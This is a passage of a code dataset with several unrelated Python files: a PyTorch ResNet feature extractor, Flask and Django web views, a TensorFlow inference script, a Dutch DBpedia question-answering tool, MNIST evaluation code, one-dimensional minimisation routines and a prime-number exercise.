F.relu(self.bn1(self.conv1(x)))\n out = self.bn2(self.conv2(out))\n out += self.shortcut(x)\n out = F.relu(out)\n return out\n\n\nclass Bottleneck(nn.Module):\n expansion = 4\n\n def __init__(self, in_planes, planes, stride=1):\n super(Bottleneck, self).__init__()\n self.conv1 = nn.Conv2d(in_planes, planes, kernel_size=1, bias=False)\n self.bn1 = nn.BatchNorm2d(planes)\n self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=stride, padding=1, bias=False)\n self.bn2 = nn.BatchNorm2d(planes)\n self.conv3 = nn.Conv2d(planes, self.expansion*planes, kernel_size=1, bias=False)\n self.bn3 = nn.BatchNorm2d(self.expansion*planes)\n\n self.shortcut = nn.Sequential()\n if stride != 1 or in_planes != self.expansion*planes:\n self.shortcut = nn.Sequential(\n nn.Conv2d(in_planes, self.expansion*planes, kernel_size=1, stride=stride, bias=False),\n nn.BatchNorm2d(self.expansion*planes)\n )\n\n def forward(self, x):\n out = F.relu(self.bn1(self.conv1(x)))\n out = F.relu(self.bn2(self.conv2(out)))\n out = self.bn3(self.conv3(out))\n out += self.shortcut(x)\n out = F.relu(out)\n return out\n\n\nclass ResNet_extract(nn.Module):\n def __init__(self, block, num_blocks, num_classes=100, nc=NC, img_height=IMG_SIZE, img_width=IMG_SIZE):\n super(ResNet_extract, self).__init__()\n self.in_planes = 64\n\n self.main = nn.Sequential(\n nn.Conv2d(nc, 64, kernel_size=3, stride=1, padding=1, bias=False), # h=h\n nn.BatchNorm2d(64),\n nn.ReLU(),\n self._make_layer(block, 64, num_blocks[0], stride=1), # h=h\n nn.MaxPool2d(kernel_size=2, stride=2), #64\n self._make_layer(block, 128, num_blocks[1], stride=2), #32\n nn.MaxPool2d(kernel_size=2, stride=2), #16\n self._make_layer(block, 256, num_blocks[2], stride=2), #8\n self._make_layer(block, 512, num_blocks[3], stride=2), #4\n nn.AvgPool2d(kernel_size=4)\n )\n self.classifier_1 = nn.Sequential(\n nn.Linear(512*block.expansion, img_height*img_width*nc),\n )\n self.classifier_2 = nn.Sequential(\n nn.BatchNorm1d(img_height*img_width*nc),\n nn.ReLU(),\n nn.Dropout(0.5),\n\n nn.Linear(img_height*img_width*nc, 1024),\n nn.BatchNorm1d(1024),\n nn.ReLU(),\n nn.Dropout(0.5),\n\n nn.Linear(1024, 256),\n nn.BatchNorm1d(256),\n nn.ReLU(),\n nn.Dropout(0.5),\n\n nn.Linear(256, num_classes),\n )\n\n def _make_layer(self, block, planes, num_blocks, stride):\n strides = [stride] + [1]*(num_blocks-1)\n layers = []\n for stride in strides:\n layers.append(block(self.in_planes, planes, stride))\n self.in_planes = planes * block.expansion\n return nn.Sequential(*layers)\n\n def forward(self, x):\n # x 
= nn.functional.interpolate(x,size=resize,mode='bilinear',align_corners=True)\n features = self.main(x)\n features = features.view(features.size(0), -1)\n features = self.classifier_1(features)\n out = self.classifier_2(features)\n return out, features\n\n\ndef ResNet18_extract(num_classes=100):\n return ResNet_extract(BasicBlock, [2,2,2,2], num_classes=num_classes)\n\ndef ResNet34_extract(num_classes=100):\n return ResNet_extract(BasicBlock, [3,4,6,3], num_classes=num_classes)\n\ndef ResNet50_extract(num_classes=100):\n return ResNet_extract(Bottleneck, [3,4,6,3], num_classes=num_classes)\n\ndef ResNet101_extract(num_classes=100):\n return ResNet_extract(Bottleneck, [3,4,23,3], num_classes=num_classes)\n\ndef ResNet152_extract(num_classes=100):\n return ResNet_extract(Bottleneck, [3,8,36,3], num_classes=num_classes)\n\n\nif __name__ == \"__main__\":\n net = ResNet34_extract(num_classes=100).cuda()\n x = torch.randn(16,3,128,128).cuda()\n out, features = net(x)\n print(out.size())\n print(features.size())\n\n def get_parameter_number(net):\n total_num = sum(p.numel() for p in net.parameters())\n trainable_num = sum(p.numel() for p in net.parameters() if p.requires_grad)\n return {'Total': total_num, 'Trainable': trainable_num}\n\n print(get_parameter_number(net))\n","sub_path":"ImageNet-100/DRE-F-SP+RS/models/ResNet_extract.py","file_name":"ResNet_extract.py","file_ext":"py","file_size_in_byte":5781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"374933277","text":"message =\"\"\"\\\nNews of medical examination\n{}\nWe will carry out a medical examination as follows.\nDate: {} {} ~\nPlace: Kida Clinic\nImplementation items: height, weight, vision measurement, auscultation, blood test \"\"\"\n\ndata = [\n ('Tanaka', '5/21', '13:00'),\n ('Yoshida', '5/21', '14:00'),\n ('Yamanobe', '5/21', '15:00'),\n ]\n\ndef main():\n for d in data:\n print('---------------')\n print(message.format(d[0], d[1], d[2]))\n\nif __name__ == '__main__':\n main()","sub_path":"string/format_loop_taple.py","file_name":"format_loop_taple.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"19050224","text":"from flask import Blueprint, render_template, request\nfrom flask_cors import cross_origin\nfrom datetime import datetime\n\nfrom currenciesapp.models import Report, Currency\n\nmain = Blueprint('main', __name__)\n\n\n@main.route(\"/\")\n@main.route(\"/home\")\n@cross_origin()\ndef home():\n type = request.args.get('type', 'fiat', type=str)\n start_date = Report.query.join(Currency).filter(Currency.type == type).order_by(Report.date.asc()).first().date.date()\n end_date = Report.query.join(Currency).filter(Currency.type == type).order_by(Report.date.desc()).first().date.date()\n date = request.args.get('date', end_date.strftime('%Y-%m-%d'), type=str)\n reports = Report.query.join(Currency).filter(Currency.type == type).filter(Report.date == date).all()\n return render_template('home.html', reports=reports, type=type, selected_date=date)\n","sub_path":"currenciesapp/main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"139062159","text":"import tensorflow as tf\r\nimport numpy as np\r\n\r\nimport os\r\nimport h5py\r\nfrom PIL import Image\r\nfrom ops import *\r\nimport scipy.io as sio\r\n\r\n\r\ndef modcrop(im, modulo):\r\n\tif 
len(im.shape) == 3:\r\n\t\tsize = np.array(im.shape)\r\n\t\tsize = size - (size % modulo)\r\n\t\tim = im[0 : size[0], 0 : size[1], :]\r\n\telif len(im.shape) == 2:\r\n\t\tsize = np.array(im.shape)\r\n\t\tsize = size - (size % modulo)\r\n\t\tim = im[0 : size[0], 0 : size[1]]\r\n\telse:\r\n\t\traise AttributeError\r\n\treturn im\r\n\r\n\r\ndef shave(im, border):\r\n\tif len(im.shape) == 3:\r\n\t\treturn im[border[0] : -border[0], \r\n\t\t border[1] : -border[1], :]\r\n\telif len(im.shape) == 2:\r\n\t\treturn im[border[0] : -border[0], \r\n\t\t border[1] : -border[1]]\r\n\telse:\r\n\t\traise AttributeError\r\n\r\n\r\nclass Net(object):\r\n\tdef __init__(self, lr, non_local, wl, tower, reuse):\r\n\t\t# training inputset\r\n\t\tself.lr = lr\r\n\t\t\r\n\t\t# multi-gpu related settings\r\n\t\tself.reuse = reuse\r\n\t\tself.tower = tower\r\n\t\t\r\n\t\t# parameter lists for weights and biases\r\n\t\tself.W_params = []\r\n\t\tself.b_params = []\r\n\t\t\r\n\t\t# coefficient of weight decay\r\n\t\tself.wl = wl\r\n\t\t\r\n\t\t# whether to enable the non-local block\r\n\t\tself.non_local = non_local\r\n\t\r\n\t\r\n\tdef dfus_block(self, bottom, i):\r\n\t\tact = tf.nn.relu\r\n\r\n\t\twith tf.variable_scope('dfus_block' + str(i), reuse=self.reuse):\r\n\t\t\tconv1 = act(conv2d(bottom, 64, [1, 1], wl=None, reuse=self.reuse, tower_index=self.tower, scope='conv' + str(i) + '_i'), name='relu' + str(i) + '_i')\r\n\r\n\t\t\tfeat1 = act(conv2d(conv1, 16, [3, 3], wl=self.wl, reuse=self.reuse, tower_index=self.tower, scope='conv' + str(i) + '_1'), name='relu' + str(i) + '_1')\r\n\t\t\tfeat15 = act(conv2d(feat1, 8, [1, 1], wl=self.wl, reuse=self.reuse, tower_index=self.tower, scope='conv' + str(i) + '_15'), name='relu' + str(i) + '_15')\r\n\r\n\t\t\tfeat2 = act(conv2d(conv1, 16, [3, 3], wl=self.wl, reuse=self.reuse, tower_index=self.tower, scope='conv' + str(i) + '_2'), name='relu' + str(i) + '_2')\r\n\t\t\tfeat23 = act(conv2d(feat2, 8, [1, 1], wl=self.wl, reuse=self.reuse, tower_index=self.tower, scope='conv' + str(i) + '_23'), name='relu' + str(i) + '_23')\r\n\r\n\t\t\tfeat = tf.concat([feat1, feat15, feat2, feat23], 3, name='conv' + str(i) + '_c1')\r\n\t\t\tfeat = act(conv2d(feat, 16, [1, 1], wl=None, reuse=self.reuse, tower_index=self.tower, scope='conv' + str(i) + '_r'), name='relu' + str(i) + '_r')\r\n\r\n\t\t\ttop = tf.concat([bottom, feat], 3, name='conv' + str(i) + '_c2')\r\n\r\n\t\treturn top\r\n\r\n\r\n\tdef ddfn(self, bottom, step, b=10):\r\n\t\tact = tf.nn.relu\r\n\r\n\t\twith tf.variable_scope('ddfn_' + str(step), reuse=self.reuse):\r\n\t\t\twith tf.name_scope('msfeat'):\r\n\t\t\t\tconv13 = act(conv2d(bottom, 16, [3, 3], wl=self.wl, reuse=self.reuse, tower_index=self.tower, scope='conv1_3'), name='relu1_3')\r\n\t\t\t\tconv15 = act(conv2d(bottom, 16, [3, 3], wl=self.wl, reuse=self.reuse, tower_index=self.tower, scope='conv1_5'), name='relu1_5')\r\n\r\n\t\t\t\tconv135 = act(conv2d(conv13, 16, [1, 1], wl=self.wl, reuse=self.reuse, tower_index=self.tower, scope='conv1_3_5'), name='relu1_3_5')\r\n\t\t\t\tconv153 = act(conv2d(conv15, 16, [1, 1], wl=self.wl, reuse=self.reuse, tower_index=self.tower, scope='conv1_5_3'), name='relu1_5_3')\r\n\r\n\t\t\t\tconv1 = tf.concat([conv13, conv15, conv135, conv153], 3, name='conv1_c')\r\n\r\n\t\t\tif self.non_local:\r\n\t\t\t\tconv1, _ = non_local_block(conv1, reuse=self.reuse, tower_index=self.tower)\r\n\r\n\t\t\tfeat = self.dfus_block(conv1, 2)\r\n\r\n\t\t\tfor i in range(3, b, 1):\r\n\t\t\t\tfeat = self.dfus_block(feat, i)\r\n\r\n\t\t\ttop = feat\r\n\r\n\t\t\treturn 
top\r\n\t\r\n\t\r\n\tdef build_net(self):\r\n\t\twith tf.variable_scope('net', reuse=self.reuse):\r\n\t\t\tfeat0 = self.ddfn(self.lr, 0, b=60)\r\n\t\t\tfeat1 = self.ddfn(self.lr, 1, b=60)\r\n\t\t\tfeat2 = self.ddfn(self.lr, 2, b=60)\r\n\t\t\tfeat = tf.concat([feat0, feat1, feat2], axis=3)\r\n\t\t\t\r\n\t\t\toutputs = conv2d(feat, 31, [1, 1], W_init=tf.truncated_normal_initializer(mean=0.0, stddev=0.001),\r\n\t\t\t add_biases=True, wl=None, reuse=self.reuse, tower_index=self.tower, scope='fusion')\r\n\t\t\tself.sr = outputs\r\n\r\n\r\ndef main():\r\n\t# folder path\r\n\tlr_folder = './NTIRE2018_Test_RealWorld'\r\n\toutput_folder = './test_results_1'\r\n\ttest_ims = ['Fri_1215-1110', 'Fri_1215-1125', 'Fri_1215-1306', 'Sat_1223-1134', 'Sat_1223-1337']\r\n\t\r\n\twith tf.device('/cpu:0'):\r\n\t\tlr = tf.placeholder('float', [1, None, None, 3])\r\n\t\r\n\t# recreate the network\r\n\tnet = Net(lr, False, None, 0, reuse=False)\r\n\twith tf.device('/cpu:0'):\r\n\t\tnet.build_net()\r\n\toutput = net.sr\r\n\t\r\n\t# create a session for running operations in the graph\r\n\tconfig = tf.ConfigProto(allow_soft_placement=True)\r\n\tconfig.gpu_options.allow_growth = True\r\n\tsess = tf.Session(config=config)\r\n\t\r\n\t# restore weights\r\n\tsaver = tf.train.Saver()\r\n\t\r\n\t# set a range for searching\r\n\tstart_iter = 124000\r\n\tstep_iter = 1000\r\n\tend_iter = 124000\r\n\t\r\n\t# search for the best model\r\n\trecord_psnr = []\r\n\tfor itera in np.arange(start_iter, end_iter + step_iter, step_iter):\r\n\t\tsaver.restore(sess, os.path.join('./models', 'model.ckpt-' + str(itera)))\r\n\t\tfor name in test_ims:\r\n\t\t\tim_name = name + '_camera.jpg'\r\n\t\t\tim_lr = np.array(Image.open(os.path.join(lr_folder, im_name)))\r\n\t\t\tim_lr = im_lr.astype(np.float32) / 255.0\r\n\t\t\tim_lr = np.expand_dims(im_lr, axis=0)\r\n\r\n\t\t\tim_sr = sess.run(output, feed_dict={lr: im_lr})\r\n\t\t\tim_sr = np.squeeze(im_sr) * 4095.0\r\n\t\t\t\r\n\t\t\tmat_name = name + '.mat'\r\n\t\t\tsio.savemat(os.path.join(output_folder, mat_name), {'rad': np.transpose(im_sr, [0, 1, 2])})\r\n\t\t\tprint(name)\r\n\r\n\r\nif __name__ == '__main__':\r\n\tmain()\r\n","sub_path":"hscnn-d_real/inference/inference1.py","file_name":"inference1.py","file_ext":"py","file_size_in_byte":5379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"307717121","text":"from SPARQLWrapper import SPARQLWrapper, JSON\nfrom subprocess import Popen, call, DEVNULL, STDOUT, check_output\nimport sys, os, re\n\n#Files which can be used\nFILE_PAIRCOUNT = \"pairCounts\"\nFILE_SIMILARWORDS = \"similarwords\"\n\n#Bundles the sentence, domain and property in one class\nclass Question:\n\tsentence = None\n\tdomain = None\n\tproperty = None\n\n#Links a SPARQL property to a list of property names\nclass PropertyLink:\n\tSPARQLProperty = None\n\tproperties = None\n\tdef __init__(self, SPARQLPropertyIn, propertiesIn):\n\t\tself.SPARQLProperty = SPARQLPropertyIn\n\t\tself.properties = propertiesIn\n\n#Shows given examples\ndef showExamples(examples):\n\tprint(\"Example sentences:\")\n\tfor example in examples:\n\t\tprint(example)\n\n#Shows help\ndef showHelp():\n\tprint(\"You can type a sentence which has the following order:\\nWie/Wat is/was/zijn/waren PROPERTY van/op/bij DOMAIN?\")\n\t#print(\"NOTE: if the word \\\"van\\\" is NOT used, the sentence WILL NOT parse!\")\n\tprint(\"You can try your own property or use one of the properties listed below:\")\n\tfor propLink in propertyLinks:\n\t\tfor prop in 
propLink.properties:\n\t\t\tprint(prop)\n\tprint(\"To exit the program type exit\")\n\tinput(\"PRESS THE ENTER KEY TO CONTINUE...\")\n\n#Searches given query and gives results\ndef searchQuery(select):\n\treturnList = []\n\tsp.setReturnFormat(JSON)\n\tresults = sp.query().convert()\n\tif len(results[\"results\"][\"bindings\"]) == 0:\n\t\treturn None\n\tfor result in results[\"results\"][\"bindings\"]:\n\t\treturnList.append(result[select][\"value\"])\n\treturn returnList\n\n#Makes a query based on a property and URI\ndef makeQuery(property, URI):\n\treturn \"SELECT str(COALESCE(?solution2, ?solution)) as ?solution \\n \\\n\tWHERE{\\n \\\n\t<\"+ URI +\"> \"+ property +\" ?solution .\\n \\\n\tOPTIONAL{?solution rdfs:label ?solution2} \\\n\t}\"\n\ndef performQuestion(property, URI):\n\tquery = makeQuery(property, URI)\n\tsp.setQuery(query)\n\tresults = searchQuery(\"solution\")\n\tif results is None or len(results) == 0:\n\t\treturn False\n\telse:\n\t\tprint(\"Result\")\n\t\tfor result in results:\n\t\t\tprint(result)\n\treturn True\n\n#Removes articles from the input\ndef removeArticles(input):\n\tfor word in articles:\n\t\tif word in input:\n\t\t\tinput = input.replace(word+\" \", \"\")\n\treturn input\n\n#Finds a substring between first and last\ndef find_between( input, first, last ):\n try:\n start = input.index( first ) + len( first )\n end = input.index( last, start )\n return input[start:end]\n except ValueError:\n return \"\"\n\n#Clears the given q\ndef clearQ(q):\n\tq.sentence = None\n\tq.property = None\n\tq.domain = None\n\treturn q\n\n#Checks the variables in Q, False if it is ok, True is is not\ndef checkQ(q):\n\tif q.property == None:\n\t\tprint(\"ERROR: Incorrect or no property given!\\n Type \\\"help\\\" to see how the program should be used!\", file=sys.stderr)\n\t\treturn True\n\tif q.domain == None:\n\t\tprint(\"ERROR: No domain given!\\nType \\\"help\\\" to see how the program should be used!\", file=sys.stderr)\n\t\treturn True\n\treturn False\n\n#Returns the string with the highers frequency\ndef getHighestPairCount(PCList):\n\treturnItem = None\n\tfreq = None\n\tfor item in PCList:\n\t\tcurrentFreq = find_between(find_between(item, \"\\t\", \"\\n\") + \"\\n\", \"\\t\", \"\\n\")\n\t\tif freq is None or freq < int(currentFreq):\n\t\t\tfreq = int(currentFreq)\n\t\t\treturnItem = item\n\treturn returnItem\n\n#Searches the given file on the given query\ndef search(query, file):\n\toutList = []\n\tif file == FILE_SIMILARWORDS and \"#\" not in query:\n\t\tquery += \"#\"\n\tfor line in open(file, \"r\"):\n\t\tif re.search(\"^\"+query, line , re.IGNORECASE):\n\t\t\toutList.append(line)\n\treturn outList\n\n#gives the URI of a given domain\ndef getDomainURI(domain):\n\tPCList = search(domain, FILE_PAIRCOUNT)\n\tif len(PCList) is 0:\n\t\treturn None\n\tbestItem = getHighestPairCount(PCList)\n\treturn find_between(bestItem, \"\\t\", \"\\t\")\n\ndef makeAZ(string):\n\treturn re.sub(r'[\\W_]+', '', string)\n\ndef getSimilarWords(string):\n\treturnList = []\n\tsearchList = search(string, FILE_SIMILARWORDS)\n\tfor item in searchList:\n\t\treturnList += item.split(\"#\")\n\tif not returnList:\n\t\treturnList.append(string)\n\treturn returnList\n\t\t\ndef findPropertySimilarWords(sentence):\n\tbestProp = None\n\tfor verb in verbs:\n\t\tfor preprosition in prepositions:\n\t\t\tif verb in sentence and preprosition in sentence:\n\t\t\t\tcurrentProp = str(find_between(sentence.lower(), verb+\" \", \" \"+preprosition))\n\t\t\t\tif currentProp is not None and currentProp != \"\" and 
currentProp != \" \" and ( bestProp is None or len(bestProp) < len(currentProp)):\n\t\t\t\t\tbestProp = currentProp\n\tif bestProp is None:\n\t\treturn None\n\treturn getSimilarWords(removeArticles(bestProp))\n\n# search in files using grep NOT USED\ndef grep(query, file):\n\t#currentDir = os.path.dirname(os.path.realpath(__file__))\n\t#Popen(currentDir, stdout=DEVNULL, stderr=STDOUT, shell=True)\n\t#grep -i '^QUERY(#)' file\n\tsyscall = \"grep -i \\'^\"+query\n\tif file == \"similarwords\":\n\t\tsyscall += \"#\"\n\tsyscall += \"\\' \" + file\n\t#out = call(str(syscall), stdout=DEVNULL, stderr=STDOUT, shell=True)\n\tout = os.system(syscall)\n\t#print(check_output())\n\treturn out\n\n#Parses the question, adds property and domain to q\ndef parseQuestion(q):\n\tinput = q.sentence.lower()\n\tfor propLink in propertyLinks:\n\t\tfor prop in propLink.properties:\n\t\t\tif prop in input:\n\t\t\t\tq.property = propLink.SPARQLProperty\n\t\t\t\tbreak\n\t\tif q.property is not None and q.property is not \"\":\n\t\t\tbreak\n\tfor word in prepositions:\n\t\ttempDomain = find_between(input,word+\" \",\"?\")\n\t\tif tempDomain != \"\" and (q.domain is None or len(q.domain) < len(tempDomain)):\n\t\t\tq.domain = tempDomain\n\treturn q\n\ndef checkDomain(q):\n\tif q.domain is None:\n\t\tprint(\"ERROR: No domain given!\\nType \\\"help\\\" to see how the program should be used!\", file=sys.stderr)\n\t\treturn True\n\treturn False\n\ndef checkProperty(q):\n\tif q.property == None:\n\t\treturn True\n\treturn False\n\t \n#All propertylinks\npropertyLinks = [\nPropertyLink(\"prop-nl:opener\", [\"opener\", \"openaar\"]),\nPropertyLink(\"prop-nl:opening\", [\"begin datum\", \"opening\"]),\nPropertyLink(\"prop-nl:sluiting\", [\"eind datum\", \"sluiting\"]),\nPropertyLink(\"prop-nl:plaats\", [\"locatie\", \"plaats\"]),\nPropertyLink(\"prop-nl:atleten\", [\"aantal atleten\", \"hoeveelheid deelnemers\"]),\nPropertyLink(\"prop-nl:lengte\", [\"lengte\", \"grootte\"]),\nPropertyLink(\"prop-nl:bijnaam\", [\"bijnaam\", \"alias\"]),\nPropertyLink(\"prop-nl:geboortedatum\", [\"geboortedatum\", \"geboortedag\"]),\nPropertyLink(\"prop-nl:discipline\", [\"discipline\", \"sport\"]),\nPropertyLink(\"prop-nl:trainer\", [\"trainer\", \"coach\"])\n]\n\n#The grammar which is used\nintPronoun = [\"wie\", \"wat\"]\narticles = [\"de\", \"het\"]\nverbs = [\"is\", \"zijn\", \"was\", \"waren\"]\nprepositions = [\"van\", \"op\", \"bij\"]\ngrammar = intPronoun + articles + verbs + prepositions\n\n#Examples\nexamples = [\n\"Wie is de opener van de Olympische Zomerspelen 1936?\",\n\"Wat is de lengte van Fatima Moreira de Melo?\",\n\"Wat was de start datum van de Olympische Winterspelen 2014?\",\n\"Wat was de eind datum van de Olympische Winterspelen 2010?\",\n\"Wat was de locatie van de Olympische Zomerspelen 2000?\",\n\"Wat is het aantal atleten van de Olympische Zomerspelen 1996?\",\n\"Wat is de bijnaam van Yuri van Gelder?\",\n\"Wat is de geboortedatum van Sven Kramer?\",\n\"Wat is de discipline van Epke Zonderland?\",\n\"Wie is de coach van Naomi van As?\"\n]\n\nprint(\"To exit the program, type \\\"exit\\\". 
For help type \\\"help\\\"\", file=sys.stderr)\nshowExamples(examples)\n\nq = Question()\nsp = SPARQLWrapper(\"http://nl.dbpedia.org/sparql\")\n\n#while True:\nfor line in sys.stdin:\n\tq = clearQ(q)\n\tq.sentence = line.rstrip()\n\t#q = clearQ(q)\n\t#q.sentence = input(\"TYPE A QUESTION OR COMMAND...\\n\")\n\n\tif q.sentence == \"exit\":\n\t\tbreak\n\tif q.sentence == \"help\":\n\t\tshowHelp()\n\t\tcontinue\n\n\tif \"?\" not in q.sentence:\n\t\tq.sentence += \"?\"\n\n\tq = parseQuestion(q)\n\n\tif checkDomain(q):\n\t\tcontinue\t\t\n\n\tURI = getDomainURI(q.domain)\n\n\tif URI is None:\n\t\tURI = getDomainURI(removeArticles(q.domain))\n\t\tif URI is None:\n\t\t\tprint(\"Error: No corresponding domain found to \"+ q.domain, file=sys.stderr)\n\t\t\tcontinue\n\n\tif checkProperty(q):\n\t\tSWList = findPropertySimilarWords(q.sentence)\n\t\tif SWList is None:\n\t\t\tprint(\"ERROR: Could not find property\", file=sys.stderr)\n\t\t\tcontinue\n\t\tfor item in SWList:\n\t\t\tif (performQuestion(\"prop-nl:\"+makeAZ(item.lower()), URI)):\n\t\t\t\tbreak\n\t\t\telif SWList.index(item) == len(SWList) - 1:\n\t\t\t\tprint(\"No solution found!\")\n\telse:\n\t\tif (not performQuestion(q.property, URI)):\n\t\t\tprint(\"No solution found!\")\n\nprint(\"Terminating Program!\", file=sys.stderr)\n","sub_path":"Assignment3/s2525119-A3.py","file_name":"s2525119-A3.py","file_ext":"py","file_size_in_byte":8333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"55706286","text":"#! /usr/bin/env python3\nimport os\nfrom glob import glob\nimport argparse\nfrom tensorflow import keras\nimport utils\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--idx_ckpt', type=int, default=-1,\n help='Index of the checkpoint to load. (default: -1)')\nparser.add_argument('--fft', dest='fft', action='store_true')\nparser.add_argument('--fashion', dest='fashion', action='store_true')\nargs = parser.parse_args()\n\ncheckpoints = sorted(glob('logs/*'))\nif len(checkpoints):\n [print(f'{idx}: {ckpt}') for idx, ckpt in enumerate(checkpoints)]\nelse:\n raise ValueError('Can not find any checkpoint.')\n\nif args.fashion:\n mnist = keras.datasets.fashion_mnist\nelse:\n mnist = keras.datasets.mnist\n\n_, (x_test, y_test) = mnist.load_data()\n\nutils.allow_gpu_memory_growth()\n\nmodel = utils.build_model(fft=args.fft)\nmodel.compile(\n loss='sparse_categorical_crossentropy',\n metrics=['accuracy']\n)\n\nloss, acc = model.evaluate(x_test, y_test, verbose=0)\n\nprint(f'[!] Untrained model: accuracy = {100 * acc:5.2f}%')\n\nprint(f'Loading {checkpoints[args.idx_ckpt]}')\nmodel.load_weights(os.path.join(checkpoints[args.idx_ckpt], 'cp.ckpt'))\n\nloss, acc = model.evaluate(x_test, y_test, verbose=0)\n\nprint(f'[!] Restored model: accuracy = {100 * acc:5.2f}%')\n","sub_path":"eval.py","file_name":"eval.py","file_ext":"py","file_size_in_byte":1278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"531493763","text":"\"\"\"kohnavardi URL Configuration\r\n\r\nThe `urlpatterns` list routes URLs to views. For more information please see:\r\n https://docs.djangoproject.com/en/2.2/topics/http/urls/\r\nExamples:\r\nFunction views\r\n 1. Add an import: from my_app import views\r\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\r\nClass-based views\r\n 1. Add an import: from other_app.views import Home\r\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\r\nIncluding another URLconf\r\n 1. 
Import the include() function: from django.urls import include, path\r\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\r\n\"\"\"\r\nfrom django.urls import path , include\r\nfrom .views import *\r\nfrom django.contrib.auth.views import LoginView , LogoutView\r\nfrom . import admin_view\r\n\r\n\r\n\r\napp_name = 'Account'\r\nurlpatterns = [\r\n\tpath('login/',Login,name = 'login'),\r\n\tpath('logout/', Logout, name='logout'),\r\n\tpath('Profile/', Profile, name='profile'),\r\n\tpath('change_password/', Change_Password, name='change_password'),\r\n\tpath('all_orders/', admin_view.All_Orders, name='all_orders'),\r\n\tpath('orders/', Customer_Orders, name='orders'),\r\n\tpath('travels/', Travels, name='travels'),\r\n\tpath('add_product/', admin_view.Add_Product, name='add_product'),\r\n\tpath('all_products/', admin_view.All_Products, name='all_products'),\r\n\tpath('edit_product//', admin_view.Edite_Product, name='edit_product'),\r\n\tpath('add_group/', admin_view.Add_Group, name='add_group'),\r\n\tpath('all_grouping/', admin_view.All_Grouping, name='all_grouping'),\r\n\tpath('edit_grouping/', admin_view.Edit_Grouping, name='edit_grouping'),\r\n\tpath('add_category/', admin_view.Add_Category, name='add_category'),\r\n\tpath('all_category/', admin_view.All_Category, name='all_category'),\r\n\tpath('edit_category//', admin_view.Edit_Category, name='edit_category'),\r\n\tpath('all_sliders/', admin_view.All_Slider, name='all_slider'),\r\n\tpath('add_slider/', admin_view.Add_Slider, name='add_slider'),\r\n\tpath('edit_slider//', admin_view.Edit_Slider, name='edit_slider'),\r\n\r\n\r\n]\r\n","sub_path":"Account/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2059,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"237714820","text":"from math import ceil, sqrt\nfrom utils import FuncCounter\n\n\ndef naive_method(func, a, b, eps=0.01, debug=False):\n \"\"\"Минимизация наивным методом\"\"\"\n f = FuncCounter(func)\n n = ceil((b - a) / eps)\n tests = []\n\n for i in range(n + 1):\n x = a + eps * i\n tests.append((f(x), x))\n\n minimum = min(tests)[1]\n if debug:\n print(\"naive_method func counter\", f.counter)\n return minimum\n\n\ndef dichotomy_method(func, a, b, eps=0.01, delta_mult=0.5, debug=False):\n \"\"\"Минимизация методом дихотомии\"\"\"\n f = FuncCounter(func)\n delta = eps * delta_mult\n\n ai = a\n bi = b\n\n while (bi - ai) > eps * 2:\n ci = (ai + bi - delta) / 2\n di = (ai + bi + delta) / 2\n\n if f(ci) <= f(di):\n ai = ai\n bi = di\n else:\n ai = ci\n bi = bi\n\n if debug:\n print(\"dichotomy_method func counter\", f.counter)\n return (bi + ai) / 2\n\n\ndef gold_sech_method(func, a, b, eps=0.01, debug=False):\n \"\"\"Минимизация методом золотого сечения\"\"\"\n f = FuncCounter(func)\n ai = a\n bi = b\n ci = ai + (bi - ai) * (3 - sqrt(5)) / 2\n di = ai + (bi - ai) * (sqrt(5) - 1) / 2\n\n while (bi - ai) > eps * 2:\n if f(ci) <= f(di):\n ai = ai\n bi = di\n di = ci\n ci = ai + (bi - ai) * (3 - sqrt(5)) / 2\n else:\n ai = ci\n bi = bi\n ci = di\n di = ai + (bi - ai) * (sqrt(5) - 1) / 2\n\n if debug:\n print(\"gold_sech_method func counter\", f.counter)\n\n return (bi + ai) / 2\n","sub_path":"zero_order_methods.py","file_name":"zero_order_methods.py","file_ext":"py","file_size_in_byte":1658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"181904186","text":"lista = [5,7,4,18,3,7,5,1,2,12,7,13]\nx = int(max(lista))\ntab = [1]*(x+1)\n\nfor i in 
range(2, x): # Builds the table [1,1,1,1,0,1,0,1,0,0...]\n    if(tab[i]==1): # indices holding a 1 are the prime numbers\n        for j in range(i+1, x+1):\n            if (j%i==0):\n                tab[j]=0\n\nliczby_pierwsze = []\nfor k in range(2,x+1): # Builds the list of prime numbers \n    if(tab[k]==1):\n        liczby_pierwsze = liczby_pierwsze + [k]\n    \nuniq = list(set(lista)) # Builds the list of unique values from \"lista\" \n    \nfor l in range(len(uniq)): # Loop over all numbers in uniq\n    if (lista.count(uniq[l])%2!=0): # If the number occurs an odd number of times\n        if (liczby_pierwsze.count(uniq[l])>0): # and if the number appears in liczby_pierwsze\n            for m in range(0,lista.count(uniq[l])): # removes all such numbers from \"lista\" \n                lista.remove(uniq[l]) \nprint(lista)\n","sub_path":"WDI/Zajecia7/Zadanie1.py","file_name":"Zadanie1.py","file_ext":"py","file_size_in_byte":1052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"487872708","text":"from flask import Flask, request, render_template, redirect\nimport time\nFORMAT = \"%Y-%m-%d\"\nheute=time.strftime(FORMAT)\n\napp = Flask(__name__)\n\nclass Plan():\n    def __init__(self, datum, kalorien, text):\n        self.datum = datum\n        self.kalorien = kalorien\n        self.text = text\n\n    def __str__(self):\n        return self.datum + \"\\t\" + self.kalorien + \"\\t\" + self.text\n\n    def 